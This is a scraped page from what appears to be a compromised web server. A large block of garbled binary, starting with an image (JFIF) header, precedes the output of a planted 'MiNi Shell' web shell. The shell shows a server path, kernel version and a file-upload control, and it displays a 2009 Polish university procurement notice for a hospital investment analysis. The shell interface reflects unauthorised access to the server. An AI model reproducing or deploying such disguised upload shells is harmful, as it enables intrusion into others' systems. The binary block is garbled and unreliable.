JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090917/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090917/322288-N-2009.html

<p class="kh_header"><b>Łódź: Przeprowadzenie analizy procesu inwestycyjnego dotyczącego Centrum Kliniczno-Dydaktycznego w Łodzi</b><br>
<b>Numer ogłoszenia: 322288 - 2009; data zamieszczenia: 17.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny , al. Kościuszki 4, 90-419 Łódź, woj. łódzkie, tel. 042 6302330, faks 042 6393952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umed.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie analizy procesu inwestycyjnego dotyczącego Centrum Kliniczno-Dydaktycznego w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Analiza procesu inwestycyjnego dotyczącego dokończenia budowy Szpitala w Centrum Kliniczno-Dydaktycznym UM w Łodzi.
I. ANALIZA EKONOMICZNO-BUDOWLANA INWESTYCJI
1. Ustalenie zakresu rzeczowego i finansowego inwestycji, objętej umową z wykonawcą i przygotowanego w jej ramach projektu, który należałoby usunąć lub zmienić aby dostosować obiekt do projektu nowego Programu Medycznego;
2. Analiza wpływu zmiany programu medycznego i konsekwencji z tego wynikających dla umowy z wykonawcą - wskazanie zagrożeń jak i sposobów eliminacji negatywnych konsekwencji lub zminimalizowania ich.
3. Analiza możliwości i wskazanie najkorzystniejszego sposobu przeprowadzania zmiany programu medycznego z uwzględnieniem aspektów ekonomicznych, technicznych i prawnych. Opracowanie przynajmniej 2 scenariuszy możliwych do zastosowania ( ich dokładna liczba zostanie ustalona w toku prac) ze wskazaniem szans i zagrożeń związanych z ich implementacją. Opracowanie harmonogramu realizacji (projekt, realizacja, odbiór, uruchomienie) dla poszczególnych scenariuszy.
II. PRZEGLĄD I ANALIZA WYKONANIA ROBÓT BUDOWLANYCH 
PRZEZ WYKONAWCĘ REALIZUJĄCEGO INWESTYCJĘ
Analiza zrealizowania  Inwestycji winna obejmować:
1. Kontrolę realizacji robót budowlanych pod względem dotrzymania terminów jak i założeń finansowych umowy,
2. Kontrolę  rozliczania finansowego kolejnych zrealizowanych etapów inwestycji przez Wykonawcę,
3. Analizę zasadności wystawienia not obciążeniowych wykonawcy przez Inwestora, 
za nieterminowe  wywiązywanie się z umowy w 2008 roku,
4. Analizę wewnętrznych procedur Inwestora pod kątem zapewnienia wymaganego nadzoru nad realizacją Inwestycji (zarówno pod kątem finansowym jak i technicznym),
5. Analizę zgodności z obowiązującymi standardami odbiorów częściowych robót budowlanych,
6. Analizę procesu identyfikowania, zatwierdzania i zlecania wykonawcy prac dodatkowych, obejmującą;
a) Analizę zasadności wykonywania prac dodatkowych pod kątem wymogów technologicznych,
b) Analizę przyczyn, dla których prace objęte dodatkowymi zleceniami nie zostały ujęte w umowie z  Wykonawcą,
c) Analizę zgodności zatwierdzania robót dodatkowych z procedurami 
i pełnomocnictwami Inwestora,
7. Przegląd wykonywanych robót budowlanych pod względem jakości oraz zgodności z warunkami technicznymi ich wykonania oraz identyfikację odstępstw od założeń i dobrych praktyk,
8. Analiza wpływu zgłoszonych do tej pory robót dodatkowych na termin zakończenia inwestycji określony w umowie z wykonawcą.
III. PRZYGOTOWANIE DO ODBIORU I URUCHOMIENIA SZPITALA
Przeprowadzenie analizy obejmującej:
1. Ocenę przygotowania Inwestycji do odbioru wg zapisów umowy
2. Wskazanie zasad i opracowanie procedur odbioru inwestycji od Wykonawcy, przekazania użytkownikowi oraz uruchomienia poszczególnych części szpitala - z uwzględnieniem warunków technicznych i możliwości funkcjonowania szpitala, bądź jego części, z równoległym prowadzeniem robót budowlanych dostosowawczych do nowego programu medycznego.
3. Możliwości etapowego uruchomiania szpitala pod kątem uzyskania pozwolenia na użytkowanie, uruchomienia szpitala oraz uzyskania stosownych kontraktów na usługi medyczne. Wskazanie najkorzystniejszej kolejności uruchomiania poszczególnych części z uwzględnieniem aspektów ekonomicznych jak i technicznych. Opracowanie harmonogramu uruchomień..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3, 71.35.61.00-9, 79.21.25.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium wynosi 4000 .- zł (wymagane przy składaniu ofert). 
Zamawiający będzie wymagał wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10 % ceny oferowanej brutto<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca musi spełniać warunki udziału w postępowaniu określone w art. 22 ustawy Prawo zamówień publicznych, tj. posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia oraz nie może podlegać wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych. 

Warunkiem dopuszczenia Wykonawcy do udziału w postępowaniu o udzielenie zamówienia jest wykonanie w ciągu ostatnich 3 lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy w tym okresie, licząc wstecz od dnia wszczęcia postępowania o udzielenie zamówienia, co najmniej 1 audytu procesu inwestycyjnego o wartości min. 100 mln zł  oraz co najmniej 3 audytów zakładów opieki zdrowotnej.

W przypadku Wykonawców wspólnie ubiegających sie o udzielenie zamówienia co najmniej jeden uczestnik konsorcjum indywidualnie lub całe konsorcjum w identycznym składzie muszą się wykazać wykonaniem w ciągu ostatnich 3 lat usług odpowiadających swoim rodzajem przedmiotowi zamówienia, tj. co najmniej 1 audytu procesu inwestycyjnego o wartości min. 100 mln zł  oraz co najmniej 3 audytów zakładów opieki zdrowotnej.


Ograniczenie liczby wykonawców, którzy zostaną zaproszeni do składania ofert: 
Przewidywana liczba wykonawców: 5. 
Obiektywne kryteria wyboru ograniczonej liczby kandydatów: Jeżeli liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż 5 Zamawiający dokona oceny Wykonawców według niżej wymienionych kryteriów:
 
Za każde wykonanie w ciągu ostatnich 3 lat kolejnego audytu zakładu opieki zdrowotnej (powyżej trzech wymaganych) Wykonawca otrzyma 1 pkt (maksymalnie 10 audytów - 10 pkt).

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, kolejne obiekty opisane powyżej muszą być wykonane przez co najmniej jednego uczestnika konsorcjum indywidualnie lub przez całe konsorcjum w identycznym składzie. 

Maksymalnie można uzyskać w punktacji 10 pkt. 

Zamawiający zaprosi do złożenia ofert 5 Wykonawców z największą liczbą punktów. W przypadku, gdy ostatnie miejsce gwarantujące zaproszenie do złożenia ofert zajmie więcej Wykonawców, z taką samą liczbą punktów, Zamawiający zaprosi ich wszystkich do składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 Prawa zamówień publicznych 
2. Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych 
3. Dokumenty potwierdzające spełnienie warunków, o których mowa w art. 22 ust. 1: 
3.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia. 
3.2 Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, 
3.3 Pełnomocnictwo dołączone w formie oryginału lub notarialnie poświadczonej kopii, jeśli oferta będzie podpisana przez pełnomocnika. 
4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 3.1,3.2 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
6. Dokumenty, o których mowa w pkt 4a i 4c powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia. Dokument, o którym mowa w pkt 4b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia. 
7. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 4, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis pkt 6 stosuje się odpowiednio. 

8. Wykonawca załączy wykaz wykonanych tj. zrealizowanych w ciągu ostatnich 3 lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy w tym okresie, licząc wstecz od dnia wszczęcia postępowania o udzielenie zamówienia, usług odpowiadających swoim rodzajem przedmiotowi zamówienia z podaniem nazwy i adresu zleceniodawcy, wartości usługi, dat wykonania. 
Za usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia należy rozumieć wykonanie audytu procesu inwestycyjnego o wartości min. 100 mln zł oraz wykonanie audytu zakładu opieki zdrowotnej.
Do wykazu należy dołączyć dokumenty uprzednich odbiorców, potwierdzające należyte wykonanie usług.

9. Wykonawca załączy do wniosku oświadczenie o poufności informacji (w oryginale) wg wzoru dostarczonego przez Zamawiającego (plik do pobrania na stronie www.umed.lodz.pl/zp - ogłoszenie ZP/87/2009) podpisane przez osobę upoważnioną.

Dokumenty, o których mowa powyżej mogą być składane w formie oryginału lub kserokopii (za wyjątkiem pełnomocnictwa i oświadczenia o pufności informacji) poświadczonej za zgodność z oryginałem przez Wykonawcę. 
Ocena spełniania warunków udziału w postępowaniu o udzielenie zamówienia dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach złożonych przez Wykonawcę. Nie spełnienie chociażby jednego z powyższych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania. 
W przypadku Wykonawców wspólnie ubiegających się o zamówienie należy dodatkowo dołączyć: 
- dokument (w formie oryginału lub notarialnie poświadczonej kopii) stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia publicznego albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, 
- w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców ubiegających się wspólnie o zamówienie zobowiązany jest złożyć dokumenty wymienione w punktach od 1 do 3.2, 
- wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zostanie przekazana z zaproszeniem do składania ofert.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2009 godzina 11:00, miejsce: Uniwersytet Medyczny w Łodzi, al. Kościuszki 4, Biuro Obsługi i Realizacji Zamówień Publicznych, III piętro , pokój nr 22.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com